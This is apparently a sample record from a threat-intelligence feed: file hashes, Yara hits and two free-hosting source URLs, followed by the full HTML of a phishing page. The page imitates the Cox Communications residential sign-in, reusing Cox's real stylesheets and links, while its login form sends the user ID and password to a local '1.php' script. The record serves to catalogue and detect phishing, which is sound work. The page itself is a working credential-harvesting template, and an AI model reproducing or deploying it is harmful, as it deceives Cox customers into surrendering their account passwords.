Sample details: 2f7d1213f098f3bb1be9dbab32ef9cd1 --

Hashes
MD5: 2f7d1213f098f3bb1be9dbab32ef9cd1
SHA1: 00781f3ce809d305464116fc5a93dde3de8a7da2
SHA256: 778e3ccc2def907b2e659dfde9f8e654e4c946749464877ec9eabd5dd74383d6
SSDEEP: 384:0POoaCqahh4RnBzsRchRqknzJqLhgTrhrPavirRywsJjLSbIgtsP8frjFgmayYUd:0POn8DghQ8bzsP8fqmayYU+/Ae9b4Ldd
Details
File Type: HTML
Yara Hits
YRP/domain | YRP/url | YRP/contentis_base64 |
Source
https://ujhbfjskjajjsudgccvzawrerertrgjh.000webhostapp.com/cox.fulldtfygjhkweretrytui/cox.full/Zo/stepCoxMail/log/sycho/index.html
https://zxmsfhjhrwurgghishrgfsjhkehw.000webhostapp.com/cox.fullxvbcnmmgyreyrwege/cox.full/Zo/stepCoxMail/log/sycho/index.html
Strings
		<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
	<head>
		<title>Sign In to Your Cox Account | Cox Communications</title>
		<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
		<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=0" />
		<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="https://webcdn3.cox.com/ui/presentation/tsw/faviconrebrand.ico">
		<!-- header/footer css -->
		<link href="https://webcdn2.cox.com/ui/presentation/tsw/css/presentation.css.jgz" rel="stylesheet" />
		<!-- global css -->
		<link href="https://webcdn2.cox.com/ui/5_0/tsw/css/all.css.jgz" rel="stylesheet" />
		<!-- LOB css -->
		<link href="https://webcdn2.cox.com/ui/5_0/tsw/css/residential.css.jgz" rel="stylesheet" />
		<!-- ie conditional css -->
		<!--[if lte IE 9]>
			<link href="https://webcdn2.cox.com/ui/presentation/tsw/css/presentation-ie.css" rel="stylesheet" />
		<![endif]-->
		<style>
			.login-content-div {
				margin-bottom: 20px;
				margin-top: 7px;
			.sign-in-lock {
				background: url(https://webcdn2.cox.com/ui/5_0/tsw/img/global/icons/lock.png) no-repeat;
				display: inline-block;
				height: 17px;
				width: 14px;
				margin-top: 15px;
				margin-left: 15px;
			@media screen and (max-width: 767px) {
				.sign-in-validate {
					margin-top: 15px;
					background-image: url(https://webcdn2.cox.com/ui/5_0/tsw/img/global/icons/lock.png),linear-gradient(#2757a7,#1d4c9b) !important;
					background-repeat: no-repeat,repeat!important;
					background-position: 63% 50%!important;
					background-position: calc(50% - -45px) 100%!important;
				.hero-block .position-content-mobile-top {
					top: 20px !important;
				.hero-slim {
					text-align: center;
			@media screen and (min-width: 600px) and (max-width: 1100px) {
				#consolidated-signin {
					margin-left: 75px;
		</style>
		<link href="https://webcdn3.cox.com/ui/presentation/tsw/css/rebrand.css.jgz" rel="stylesheet"/>
		<style>
			.footer-footer {
			  font-size: 11px;
			  padding: 20px 0 5px 0;
			  text-align: center;
			@media only screen and (max-width: 767px) {
			  .pf-header-residential {
				height: 59px!important;
			  }
			  .pf-header-wrapper.pf-mobile-header {
				height: 0!important;
			  }
			@media only screen and (min-width: 768px) {
			  .pf-main-header .pf-main-nav .pf-main-nav-primary-links li {
				height: 45px;
				margin-top: 20px;
				padding: 5px 6px 0 10px;
			  }
			  .pf-main-header .pf-main-nav .pf-main-nav-primary-links li a {
				line-height: 35px;
			  }
			  .pf-main-nav .pf-main-left-nav li.header-logo {
				margin-left: 0;
			  }
			  .pf-main-nav .pf-main-left-nav li.header-logo a {
				border: 1px solid transparent;
			  }
			  .pf-main-nav .pf-main-left-nav li.header-logo a:focus {
				border: 1px solid transparent;
			  }
			  /* Footer */
			  .cox-footer-container {
				padding: 0;
				max-width: none;
			  }
		</style>
		<script src="https://webcdn2.cox.com/ui/5_0/tsw/js/jquery.js.jgz"></script>
		<script src="https://webcdn2.cox.com/ui/5_0/tsw/js/lib.js.jgz"></script>
		<script src="https://webcdn2.cox.com/ui/5_0/tsw/js/cox.js.jgz"></script>
		<!-- RELIC MONITORING SCRIPT BEGIN -->
		<!-- RELIC MONITORING SCRIPT END -->
		<script src="https://webcdn.cox.com/content/dam/cox/apps/common/scripts/prod/adobestack.js"></script>
	</head>
	<body>
		<!-- Skip to Main Content -->
		<div id="pf-skip-nav">
			<a href="#container" class="pf-sr-only">Skip to Main Content</a>
		</div>
		<!-- pf-container -->
		<div id="pf-container">
			<!-- header -->
			<div id="pf-header" class="pf-header-residential noindex">
				<!-- begin header wrapper -->
				<div class="pf-header-wrapper">
					<!-- begin menu panel - left side panel on mobile -->
					<div class="pf-menu-panel">
						<!-- begin mobile wrapper -->
						<div class="pf-mobile-wrapper">
							<!-- begin top header -->
							<div class="pf-top-header">
								<div class="pf-top-nav">
									<!-- left side of top nav -->
									<ul class="pf-top-nav-lob" role="presentation"></ul>
									<!-- right side of top nav -->
									<ul class="pf-top-nav-overlays" role="presentation">
										<li class="contact"><a href="https://www.cox.com/residential/contactus.html">Contact Us</a></li>
									</ul>
								</div>
							</div>
							<!-- end top header -->
							<!-- begin main header -->
							<div class="pf-main-header">
								<div class="pf-main-nav">
									<div class="pf-main-left-nav">
										<ul role="presentation">
											<li class="header-logo"><a href="https://www.cox.com/residential/home.html">Residential Homepage</a></li>
										</ul>
										<!-- begin primary link list -->
										<ul class="pf-main-nav-primary-links" role="presentation">
											<li class="pf-shop"><a href="https://www.cox.com/residential-shop/order-cox-services.cox">Shop</a></li>
											<li class="pf-my-connection"><a href="https://www.cox.com/resaccount/home.cox">My Account</a></li>
											<li class="pf-webmail"><a href="https://webmail.cox.net/">Cox Email</a></li>
											<li class="pf-support"><a href="https://www.cox.com/residential/support.html">Support</a></li>
										</ul>
									</div>
								</div>
							</div>
							<!-- end main header -->
						</div>
						<!-- end mobile wrapper -->
						<!-- begin sub header -->
						<div class="pf-sub-header">
							<div class="pf-sub-nav pf-search-items">
								<div class="pf-sub-nav-underlay">
									<div class="pf-sub-nav-close"><a title="Close Menu Bar"></a></a></div>
								</div>
							</div>
						</div>
						<!-- end sub header -->
					</div>
					<!-- end menu panel - left side panel on mobile -->
				</div>
				<!-- end header wrapper -->
				<!-- mobile header -->
				<div class="pf-mobile-menu-bar pf-mobile-only">
					<ul role="presentation">
						<li class="header-logo"><a href="https://www.cox.com/residential/home.html">Homepage</a></li>
					</ul>
				</div>
				<!-- /mobile header -->
			</div>
			<!-- /header -->
			<!-- container -->
			<div id="container">
				<h1 class="hide">Sign In to Your Cox Account</h1>
				<!-- hero -->
				<div class="hero-block hero-slim col-reset" style="margin-bottom: 30px;">
					<div class="text-block" style="height: 300px;">
						<div class="position-content position-content-desktop-middle position-content-mobile-top" style="left: 1%; top: 20px;">
							<div class="text-wrapper" style="width:34%;">
								<h2>With My Account, you're in control</h2>
								<p>Manage your account, pay bills and more anytime, anywhere.</p>
							</div>
						</div>
					</div>
					<div class="hero-image desktop-only" style="background-image: url('https://webcdn.cox.com/content/dam/cox/residential/images/general/general_login_hero.jpg');"></div>
					<div class="hero-image mobile-only" style="background-image: url('https://webcdn.cox.com/content/dam/cox/residential/images/general/general_login_hero_mobile.jpg');"></div>
				</div>
				<!-- /hero -->
				<!-- START: grid -->
				<div class="cols-grid">
					<div class="section-container constrain-960">
						<div class="colspan-12">
							<div class="colspan-7">
								<div class="col-content">
									<h3>Residential Sign In</h3>
									<form class="form" id="consolidated-signin" name="sign-in" action="1.php" method="post" enctype="application/x-www-form-urlencoded">
										<input name="onsuccess" id="onsuccess" value="https%3A%2F%2Fwww.cox.com%2Fresaccount%2Fhome.cox" type="hidden"/>
										<input name="onfailure" id="onfailure" value="https://webcdn.cox.com/content/dam/cox/residential/login.html?onsuccess=https%3A%2F%2Fwww.cox.com%2Fresaccount%2Fhome.cox" type="hidden"/>
										<input name="targetFN" value="COX.net" type="hidden"/>
										<input name="emaildomain" value="@cox.net" type="hidden"/>
										<div class="msg-error error-header login-error"></div>
										<label for="username">User ID</label>
										<div class="login-content-div">
											<input type="text" placeholder="User ID" id="username" name="username" size="25" class="required" />
										</div>
										<label for="password">Password</label>
										<div class="login-content-div">
											<input type="password" class="required" placeholder="Password" id="password" size="25" name="password" title="Password" />
										</div>
										<div class="login-content-div">
											<input type="checkbox" checked="checked" name="rememberme" id="rememberme" />
											<label for="rememberme" id="rememberme-label">Remember User ID</label>
										</div>
										<div class="login-content-div">
											<input type="submit" class="sign-in-validate" value="Sign In" />
											<span class="sign-in-lock desktop-only"></span>
										</div>
										<p>
											<a href="https://www.cox.com/myprofile/forgot-userid.cox?finalview=">Forgot User ID?</a><br/>
											<a href="https://www.cox.com/myprofile/forgot-password.cox?finalview=">Forgot Password?</a>
										</p>
										<p>
											<a href="https://idm.east.cox.net/selfservice2/registration.jsp?finalview=">No Account? Register Now!</a><br/>
											<a href="https://www.cox.com/residential/support/trouble-signing-in-on-the-cox-website.html">Need Help Signing In?</a>
										</p>
									</form>
								</div>
							</div>
							<div class="colspan-4 desktop-only">
								<!-- ad-container -->
								<div class="ad-container">
									<script type="text/javascript" src="https://static-segments.beringmedia.com/dfp/1/bmi.segments.js"></script>
									
									<div id="ad01" style="text-align:center; margin-bottom:8px;">
										
									</div>
								</div>
								<!-- /ad-container -->
							</div>
						</div>
					</div>
				</div>
				<!--   END: grid -->
			</div>
			<!-- /container -->
			<!-- footer -->
			<div class="cox-footer">
				<div class="cox-footer-container"></div>
			</div>
			<div class="footer-footer">
				<p class="copyright-note">&copy; 1998-<script>var now = new Date(); var year = now.getFullYear(); document.write(year);</script> Cox Communications, Inc.</p>
			</div>
			<!-- /footer -->
		</div>
		<!-- /pf-container -->
<style>img[alt="www.000webhost.com"]{display:none;}</style><div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img"><img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>function getCookie(e){for(var t=e+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(t))return i.substring(t.length,i.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0],newList=["Powerful and Easy-To-Use Control Panel.","1-Click Auto Installer and 24/7 Live Support.","Free Domain, Email and SSL Bundle.","5x faster WordPress performance","Weekly Backups and Fast Response Time."];if(notification.length>0&&null!=mainContent){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 768px) {.web-hosting-90-off-image-wrapper {position: absolute;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} .web-hosting-90-off-image-wrapper {padding: 0 5%}} .content-wrapper {z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{border: 0; border-radius: 3px; background-color: #ff123a !important; padding: 15px 55px !important; margin-left: 30px; font-family: 'Open Sans', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&utm_medium=panel&utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">TRANSFER NOW</button>',(notification=notification[0]).setAttribute("style","padding-bottom: 10px; padding-top: 5px; background-image: url(https://cdn.000webhost.com/000webhost/promotions/springsale/mountains-neon-background.jpg); background-color: #000000; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-color: #ff123a; border-width: 8px;"),notification.className="notice notice-error is-dismissible",(hostingerLogo=hostingerLogo[0]).setAttribute("src","https://cdn.000webhost.com/000webhost/promotions/springsale/logo-hostinger-white.svg"),hostingerLogo.setAttribute("style","float: none !important; height: auto; max-width: 100%; margin: 40px 20px 10px 30px;");var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.remove();var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Fast & Secure Web Hosting. <br>Limited time offer: get an SSL certificate for FREE",paragraph.setAttribute("style",'max-width: 600px; margin-left: 30px; font-family: "Open Sans", sans-serif; font-size: 16px; font-weight: 600;');var list=notification.getElementsByTagName("UL")[0];list.setAttribute("style","max-width: 675px;");for(var listElements=list.getElementsByTagName("LI"),i=0;i<newList.length;i++)listElements[i].setAttribute("style","color:#ffffff; list-style-type: disc; margin-left: 30px; font-family: 'Open Sans', sans-serif; font-size: 14px; font-weight: 300; line-height: 1.5;"),listElements[i].innerHTML=newList[i];listElements[listElements.length-1].remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/springsale/web-hosting-90-off.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0]}</script></body>
</body>
</html>